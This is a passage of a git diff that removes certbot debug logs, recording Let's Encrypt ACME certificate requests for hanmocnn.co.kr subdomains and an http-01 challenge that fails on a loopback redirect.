23:30:11,035:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for mail.hanmocnn.co.kr -2026-02-14 23:30:11,039:DEBUG:acme.client:Requesting fresh nonce -2026-02-14 23:30:11,039:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. -2026-02-14 23:30:11,211:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 -2026-02-14 23:30:11,212:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:30:11 GMT -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: QkEzerAfwLnIKGWlrRhhVfFAZpsV16w9Uf3Rz5_svuQFLXZkr1c -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - - -2026-02-14 23:30:11,212:DEBUG:acme.client:Storing nonce: QkEzerAfwLnIKGWlrRhhVfFAZpsV16w9Uf3Rz5_svuQFLXZkr1c -2026-02-14 23:30:11,212:DEBUG:acme.client:JWS payload: -b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "mail.hanmocnn.co.kr"\n }\n ]\n}' -2026-02-14 23:30:11,218:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZndMbklLR1dsclJoaFZmRkFacHNWMTZ3OVVmM1J6NV9zdnVRRkxYWmtyMWMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", - "signature": "hUNh8dxNA5BF8icGPOEHmCPfJtyawCVJzqBeUIeEzsqfaKt8EjEL3baKo7zfOirYzp4cx4fwycJJpLYufSd76FU5VIC4kh97NG_pSWbIyn80j9NuXk5HwNLVE4iKRkI7_pP-IOcnoy69XJm8InQbyLJOHu63pbQ8lQBYi30aPXXswlYRv_ow-qXKI8MeA3kw6eImqd2c77ZqL-ixnJNxHOQGqAbaxy3RYiwdM9PI9_duw8DHOD7poKQNf0gHP2TZJ8rx3GL5tNZFi748tENlGKtQDHgYgv-80hLu5h1Ij7UjCKBIgUmyAtnETmPnoLSSIYGg26_v2gHgBKyB09R2EQ", - "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm1haWwuaGFubW9jbm4uY28ua3IiCiAgICB9CiAgXQp9" -} -2026-02-14 23:30:11,498:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 353 -2026-02-14 23:30:11,499:DEBUG:acme.client:Received response: -HTTP 201 -Server: nginx -Date: Sat, 14 Feb 2026 23:30:11 GMT -Content-Type: application/json -Content-Length: 353 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480369106906 -Replay-Nonce: QkEzerAf_AMAs5rp4OhuwCMv__bv8YNGZsyN5ulZLrYp-QHuOV8 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "pending", - "expires": "2026-02-21T23:30:11Z", - "identifiers": [ - { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480369106906" -} -2026-02-14 23:30:11,500:DEBUG:acme.client:Storing nonce: QkEzerAf_AMAs5rp4OhuwCMv__bv8YNGZsyN5ulZLrYp-QHuOV8 -2026-02-14 23:30:11,500:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:30:11,505:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZl9BTUFzNXJwNE9odXdDTXZfX2J2OFlOR1pzeU41dWxaTHJZcC1RSHVPVjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzgyODA0MDk2In0", - "signature": "u7GAisVQzkIqT5g7zSAC1_FkoVVmScpwW6Q12gDpSPi9lgnK7kq_MxapWY1FvmjQmW9piUvgi8DFfP8VcPARI-L9RpYhe8znFu_4Tw0Y_Erlqt5WrlYTg8_78Af64hbrqcvL3wlgtENkSeWP-Gj7vFAwnw_auW2ZEAWvMbRIkN49BgScBAtP7Du8ivqPmKhSaL3FJPjGFpUbqLM1i2n8LvMTsi5d4wkHP3QjV28owu3Js2X7ueG_wcYA0I1kM_-LCwhd6iiAd2qmtDM67zUS_Bcy_M0jrlQk0nMW8taxle80hGYHKb7gYVVmpastOSmnVIKtbOiqG10TGNp9T-Qr3Q", - "payload": "" -} -2026-02-14 23:30:11,692:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658782804096 HTTP/1.1" 200 827 -2026-02-14 23:30:11,693:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:30:11 GMT -Content-Type: application/json -Content-Length: 827 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: QkEzerAfdangirSe2YPrGQijk5nJQFNXPlGCS3W1xymb8N4x3mM -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:30:11Z", - "challenges": [ - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg", - "status": "pending", - "token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA" - }, - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ", - "status": "pending", - "token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/Xat64Q", - "status": "pending", - "token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA" - } - ] -} -2026-02-14 23:30:11,693:DEBUG:acme.client:Storing nonce: QkEzerAfdangirSe2YPrGQijk5nJQFNXPlGCS3W1xymb8N4x3mM -2026-02-14 23:30:11,694:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg', 'status': 'pending', 'token': 'RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA'} -2026-02-14 23:30:11,694:INFO:certbot._internal.auth_handler:Performing the following challenges: -2026-02-14 23:30:11,694:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='mail.hanmocnn.co.kr') -2026-02-14 23:30:11,695:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. -2026-02-14 23:30:11,695:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge -2026-02-14 23:30:11,696:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA -2026-02-14 23:30:11,697:DEBUG:acme.client:JWS payload: -b'{}' -2026-02-14 23:30:11,701:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZmRhbmdpclNlMllQckdRaWprNW5KUUZOWFBsR0NTM1cxeHltYjhONHgzbU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzgyODA0MDk2L1ZILUx1USJ9", - "signature": "UI4HqG8aIkUIiLRWJtRIc8wDV009hQbsVzlB8xw5-6f5Z1hniXCcTAxR1g--rstxXvbUc8JwKKzP5a1P9KqrFPQqkU8tcMgMAQdLnouHVJ4WqlF4gbT1Oho55kFYktJcknxwXtH1Na8oRdrMl58cPuZV46gCiCjA5jQyVLuaAo7UHFK23npRg4vUSsuJXmzEXiE_ak0K9LauVMSqOy8D5ccG8dxYYVUl3CwQ8JzTnUkk0oMBjX_twlf8tmWNxfqadc-xGyEQZPoykNJfZtoL_1pT40QGohUB5Bvd5fLlAwt9LMN8FhpqLh4axSdH0sXNrDtJDqVTPdABojASfUg5FQ", - "payload": "e30" -} -2026-02-14 23:30:11,879:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658782804096/VH-LuQ HTTP/1.1" 200 195 -2026-02-14 23:30:11,880:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:30:11 GMT -Content-Type: application/json -Content-Length: 195 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="up" -Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ -Replay-Nonce: QkEzerAfwS0GHOuh0p5oZ0dX2-h1cdvkUmzcj3UERL2eyB6TIs0 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ", - "status": "pending", - "token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA" -} -2026-02-14 23:30:11,880:DEBUG:acme.client:Storing nonce: QkEzerAfwS0GHOuh0p5oZ0dX2-h1cdvkUmzcj3UERL2eyB6TIs0 -2026-02-14 23:30:11,880:INFO:certbot._internal.auth_handler:Waiting for verification... -2026-02-14 23:30:12,881:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:30:12,886:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZndTMEdIT3VoMHA1b1owZFgyLWgxY2R2a1VtemNqM1VFUkwyZXlCNlRJczAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzgyODA0MDk2In0", - "signature": "Zyy-7On6I9OdwGJpo2gHLS2PkXfFYhqYyZ-6RBwPSYT4asuCiGrlDs8Zf5hfClpQUCuL9gPUZJyBBsMrfcELAyc-1Mhs-0Y60R5JxzDJM_Oe64ii_fNtOk5RhMNvhhtHL6wOpVPgqJbu6NOD1LoEwZnI95or3cQrnA5JLgXlFIH4e627oXP9FzadbEnE2ppHSHEOE-e8tJf2brEtX3hpppUW0pvvQ5TXOXk5Hzb4GelRYRgtPtJ1h-akA8imuF1_ToaZ9hme9x8dOFwITbS69CvNXLbFCZZMpVy6ABebZmIdueP96v6yOurRMhiU6sSwsm2aqY4m-hzAeXDy7QYYIQ", - "payload": "" -} -2026-02-14 23:30:13,060:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658782804096 HTTP/1.1" 200 827 -2026-02-14 23:30:13,061:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:30:12 GMT -Content-Type: application/json -Content-Length: 827 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: QkEzerAfFYA0_fEXrf2D_r6CSK-4QmrHn-QLIJngeuotvq0WOCA -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:30:11Z", - "challenges": [ - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/Xat64Q", - "status": "pending", - "token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg", - "status": "pending", - "token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA" - }, - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ", - "status": "pending", - "token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA" - } - ] -} -2026-02-14 23:30:13,061:DEBUG:acme.client:Storing nonce: QkEzerAfFYA0_fEXrf2D_r6CSK-4QmrHn-QLIJngeuotvq0WOCA -2026-02-14 23:30:13,062:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg', 'status': 'pending', 'token': 'RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA'} -2026-02-14 23:30:16,062:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:30:16,067:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZkZZQTBfZkVYcmYyRF9yNkNTSy00UW1ySG4tUUxJSm5nZXVvdHZxMFdPQ0EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzgyODA0MDk2In0", - "signature": "gzMSYR18ejGBOZMJuA6MIORDbmiGpx9s4x0SWUt-BiFracrk8MfKiEwQOk3cRTyvIRHxi6RQlTjsL1AB68tDcBBnjjjGwHEfbB4VB_OiMR--W36m2ryAFlgK_RhFbSBme2YhlvrY2wwXDbXLGi50IS0LPytBMNSAwnjbrdv1ivOTe9ghkUB0nhhTQhMRH-ZtyCrjR9y79JOpOFlMoQ_BtUtA6GcGhbGt14R5W-YCDCHz8XR44MddbE0Pg9QfoEkPYtLID5X_MAqtLyzvP6NegFkDnoO_vGzzVBT1sqQBZ1IWBoxVFY-B8KvO9IE6j87PKo5Zya61nKP2WhSCKpurMQ", - "payload": "" -} -2026-02-14 23:30:16,242:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658782804096 HTTP/1.1" 200 1062 -2026-02-14 23:30:16,243:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:30:16 GMT -Content-Type: application/json -Content-Length: 1062 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: qLPTsdtfYJSp6SSecxA1fczj1GIvYcegdMBqoPT9DzT4CCKVwMA -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - }, - "status": "invalid", - "expires": "2026-02-21T23:30:11Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ", - "status": "invalid", - "validated": "2026-02-14T23:30:11Z", - "error": { - "type": "urn:ietf:params:acme:error:connection", - "detail": "211.49.97.59: Fetching http://127.0.0.1: Invalid host in redirect target: IP address is in a reserved address block: [RFC1122], Section 3.2.1.3: Loopback", - "status": 400 - }, - "token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA", - "validationRecord": [ - { - "url": "http://mail.hanmocnn.co.kr/.well-known/acme-challenge/RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA", - "hostname": "mail.hanmocnn.co.kr", - "port": "80", - "addressesResolved": [ - "211.49.97.59" - ], - "addressUsed": "211.49.97.59" - } - ] - } - ] -} -2026-02-14 23:30:16,243:DEBUG:acme.client:Storing nonce: qLPTsdtfYJSp6SSecxA1fczj1GIvYcegdMBqoPT9DzT4CCKVwMA -2026-02-14 23:30:16,243:INFO:certbot._internal.auth_handler:Challenge failed for domain mail.hanmocnn.co.kr -2026-02-14 23:30:16,243:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='mail.hanmocnn.co.kr') -2026-02-14 23:30:16,243:DEBUG:certbot._internal.display.obj:Notifying user: -Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems: - Identifier: mail.hanmocnn.co.kr - Type: connection - Detail: 211.49.97.59: Fetching http://127.0.0.1: Invalid host in redirect target: IP address is in a reserved address block: [RFC1122], Section 3.2.1.3: Loopback - -Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet. - -2026-02-14 23:30:16,244:DEBUG:certbot._internal.error_handler:Encountered exception: -Traceback (most recent call last): - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations - self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations - raise errors.AuthorizationError('Some challenges have failed.') -certbot.errors.AuthorizationError: Some challenges have failed. - -2026-02-14 23:30:16,245:DEBUG:certbot._internal.error_handler:Calling registered functions -2026-02-14 23:30:16,245:INFO:certbot._internal.auth_handler:Cleaning up challenges -2026-02-14 23:30:16,245:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA -2026-02-14 23:30:16,245:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up -2026-02-14 23:30:16,246:DEBUG:certbot._internal.log:Exiting abnormally: -Traceback (most recent call last): - File "/opt/certbot/bin/certbot", line 6, in - sys.exit(main()) - ^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main - return internal_main.main(cli_args) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1886, in main - return config.func(config, plugins) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1598, in certonly - lineage = _get_and_save_cert(le_client, config, sans, certname, lineage) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 143, in _get_and_save_cert - lineage = le_client.obtain_and_enroll_certificate(sans, certname) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 533, in obtain_and_enroll_certificate - cert, chain, key, _ = self.obtain_certificate(sans) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 434, in obtain_certificate - orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 512, in _get_order_and_authorizations - authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations - self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations - raise errors.AuthorizationError('Some challenges have failed.') -certbot.errors.AuthorizationError: Some challenges have failed. -2026-02-14 23:30:16,248:ERROR:certbot._internal.log:Some challenges have failed. diff --git a/npm/data/logs/letsencrypt.log.5 b/npm/data/logs/letsencrypt.log.5 deleted file mode 100644 index 1563037..0000000 --- a/npm/data/logs/letsencrypt.log.5 +++ /dev/null @@ -1,608 +0,0 @@ -2026-02-14 22:59:02,196:DEBUG:certbot._internal.main:certbot version: 5.3.0 -2026-02-14 22:59:02,197:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot -2026-02-14 22:59:02,197:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-2', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'asset.hanmocnn.co.kr'] -2026-02-14 22:59:02,197:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) -2026-02-14 22:59:02,211:DEBUG:certbot._internal.log:Root logging level set at 30 -2026-02-14 22:59:02,212:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-14 22:59:02,213:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot -Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). -Interfaces: Authenticator, Plugin -Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') -Initialized: -Prep: True -2026-02-14 22:59:02,213:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None -2026-02-14 22:59:02,213:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None -2026-02-14 22:59:02,445:DEBUG:certbot._internal.main:Picked account: -2026-02-14 22:59:02,447:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. -2026-02-14 22:59:02,450:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 -2026-02-14 22:59:02,976:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 -2026-02-14 22:59:02,977:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:02 GMT -Content-Type: application/json -Content-Length: 1033 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "cljAeBYjZ0g": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", - "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", - "meta": { - "caaIdentities": [ - "letsencrypt.org" - ], - "profiles": { - "classic": "https://letsencrypt.org/docs/profiles#classic", - "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", - "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", - "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" - }, - "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", - "website": "https://letsencrypt.org" - }, - "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", - "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", - "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", - "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", - "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" -} -2026-02-14 22:59:02,978:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for asset.hanmocnn.co.kr -2026-02-14 22:59:02,983:DEBUG:acme.client:Requesting fresh nonce -2026-02-14 22:59:02,983:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. -2026-02-14 22:59:03,142:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 -2026-02-14 22:59:03,142:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:03 GMT -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: 4AH-2vvB1NQKZWcJ22HFe1FZKhiyJu9QRwMnohd6vOI912fg_tI -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - - -2026-02-14 22:59:03,143:DEBUG:acme.client:Storing nonce: 4AH-2vvB1NQKZWcJ22HFe1FZKhiyJu9QRwMnohd6vOI912fg_tI -2026-02-14 22:59:03,143:DEBUG:acme.client:JWS payload: -b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "asset.hanmocnn.co.kr"\n }\n ]\n}' -2026-02-14 22:59:03,149:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QjFOUUtaV2NKMjJIRmUxRlpLaGl5SnU5UVJ3TW5vaGQ2dk9JOTEyZmdfdEkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", - "signature": "Cia2CAWpEnKE6nmYpWaxkKmDemJ8nir20XHQA5qOB5uajnyQG8z_f9DYWFgfyXg1I3fOolmBCtFk3vYohJZWNLJu-37JWsUUxW9YYjiGRvnOgAAzBZ9yKNaf8fVxyl-6IFYN1sYcksvjZ8xPMa4gpJi7HFPeTupLp7twmLXmEUlCwCEQVZsKTi3RyVDGJ3cakSYBWxSog2oPAyahHnw5qgqVBD9u-aILs5jZ3VmR2dJrQL3NNOSD5btMIt64jghNAD2cAbZL5FBbr2IdBx_WXCQ0S6X9cxHGSnyfMC9x2-GDQIBoRlSZ8kzHKtPRpAKeqm7v4QmXkpzdkdlO2USf8g", - "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImFzc2V0Lmhhbm1vY25uLmNvLmtyIgogICAgfQogIF0KfQ" -} -2026-02-14 22:59:03,327:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 354 -2026-02-14 22:59:03,328:DEBUG:acme.client:Received response: -HTTP 201 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:03 GMT -Content-Type: application/json -Content-Length: 354 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606 -Replay-Nonce: 4AH-2vvBInvPnj6082NjF7VfMGVMq5rvdAk0tdUzHfk2LBQiN_U -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "pending", - "expires": "2026-02-21T22:59:03Z", - "identifiers": [ - { - "type": "dns", - "value": "asset.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606" -} -2026-02-14 22:59:03,328:DEBUG:acme.client:Storing nonce: 4AH-2vvBInvPnj6082NjF7VfMGVMq5rvdAk0tdUzHfk2LBQiN_U -2026-02-14 22:59:03,328:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:59:03,333:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636: -{ - "protected": 